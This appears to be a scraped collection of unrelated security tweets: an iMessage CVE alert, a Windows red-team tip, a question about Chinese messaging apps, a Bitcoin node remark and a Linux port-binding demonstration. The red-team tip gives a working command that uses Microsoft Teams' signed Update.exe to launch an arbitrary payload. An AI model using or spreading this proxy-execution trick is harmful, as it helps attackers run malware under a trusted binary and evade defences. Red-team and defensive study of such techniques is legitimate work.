CVE-2019-8646 (iMessage) is a scary bug! Leaking files remotely, without user interaction, via a callback from iOS. Delivery of SMS database in a silver plate via 0 tap, anyone?
https://t.co/uJZMRXLmvj
Other 4 bugs are as bad:
https://t.co/74XtBY82OP
you dead if not on iOS 12.4
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\
Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"
Trusted signed binary will run the payload for you 😊
#RedTeam#Pentesting
Can anyone (from China) identify these Messaging services?
imsg <--...
qg <--...
qqmesg. <-- https://t.co/AnxlLDLztf
wwmsg <--...
wxmsg <--...
yymsg <--...
In China, they have a surveillance program on social networks which looks like a jerry-rigged PRISM clone of the NSA.
Bitcoin is an adversarial network; by my count there were 68 attempts in the past week to feed an invalid block to my node. There was also an attempt to create 234,512 BTC out of thin air. This is why we don't trust, we verify.
"Non-root can't bind to ports <1024"? Not since Linux 4.11 in May 2017:
$ nc -nvlp 1
nc: Permission denied
$ echo 0 | sudo tee /proc/sys/net/ipv4/ip_unprivileged_port_start
0
$ nc -nvlp 1
Listening on [0.0.0.0] (family 0, port 1)
(Ctrl-F "port_start" in https://t.co/vOTLqTdzVF)